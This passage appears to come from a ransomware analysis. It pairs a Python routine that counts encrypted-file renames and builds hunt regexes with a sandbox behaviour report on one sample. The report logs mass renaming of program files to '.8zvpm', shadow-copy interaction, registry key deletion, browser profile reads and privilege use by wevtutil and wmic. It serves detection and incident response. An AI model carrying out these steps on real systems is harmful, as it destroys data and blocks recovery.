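    run_ids, by_directory, original_extensions = Counter(), Counter(), Counter()
    unmatched = 0
    for old, new in events:
        parsed = parse_encrypted_name(new)
        # A genuine encryption rename keeps the whole original file name as the prefix.
        if parsed is None or PureWindowsPath(old).name != parsed["original"]:
            unmatched += 1
            continue
        run_ids[parsed["run_id"]] += 1
        by_directory[parsed["directory"]] += 1
        original_extensions[parsed["original_ext"]] += 1
    return {
        "encrypted": sum(run_ids.values()),
        "unmatched": unmatched,
        "run_ids": dict(run_ids),
        "by_directory": dict(by_directory),
        "original_extensions": dict(original_extensions),
    }


def hunt_regex(run_id: str) -> re.Pattern[str]:
    """Regex matching any file renamed with the same 43-character field, for sweeping other hosts' listings."""
    return re.compile(r"\." + re.escape(run_id) + r"_[A-Za-z0-9_-]{12}\." + EXTENSION + r"$")


if __name__ == "__main__":
    summary = summarize_renames(RENAME_EVENTS)
    print(summary)
    for run_id in summary["run_ids"]:
        print("hunt pattern:", hunt_regex(run_id).pattern)
```

The check that the old name is a prefix of the new one is what separates an encryption rename from an ordinary one; a rename that only swaps the extension fails it even when the new name happens to match the layout.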
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\plugin.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_obhWKhFTuLo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_RDhSc56wBVE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupMedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\wfh.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\LargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\msdaorar.dll.mui.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_ro-bXZoO6bQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_KMS_Client-ul.xrm-ms.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_BRdfIGodR2g0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_13s.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\cc_16x11.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up.gif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_wlYSDYHTp-00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\cursors.properties.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_SuH2a19fxdY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_iBfE7dIDHt40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-16_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\176.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\cardsLoadingSequence.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6918_40x40x32.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_0iYS1xh8QEk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_yARMXAq_nvc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\ja-JP\msader15.dll.mui | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_QnDoyUOAMTA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\af_60x42.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\iheart-radio.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Show.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-black\MedTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb_new.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_OrsbQ7oYGzw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_UdsIOjMaAKM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-pl.xrm-ms.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_R5jg0NSrpA00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\WideLogo.scale-125.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\OneConnectBadgeLogo.scale-100.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-focus_32.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_ZAIAIMcrQys0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Animation\unlocking-animation-187x169.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_empty_state.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_28CaMP9IMzM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_1OW5KVgw_M80.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y2Y2zzxCJBs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_j5SVvt6PHv40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\177.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-36_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_bO-IqtT12240.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Lumia.ViewerPlugin\Assets\IconEditRichCapture.scale-100.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PeopleWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_XabFKKF90ys0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\uncommon.lua | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\Snooze.scale-80.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_wt0cMuQ9gKk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubAppList.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\SharpDXEngine\Rendering\Shaders\Builtin\HLSL\TexturedColored.fx | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\6536_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\MedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-36_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_IaofxGLGhGc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_w_55QkPBUmk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\XLMACRO.CHM.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_hFw4qPprcfw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StopwatchLargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarLogoExtensions.scale-32.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.targetsize-16_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-32_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\EMLAttachmentIcon.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_5VoCNMUwgMM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
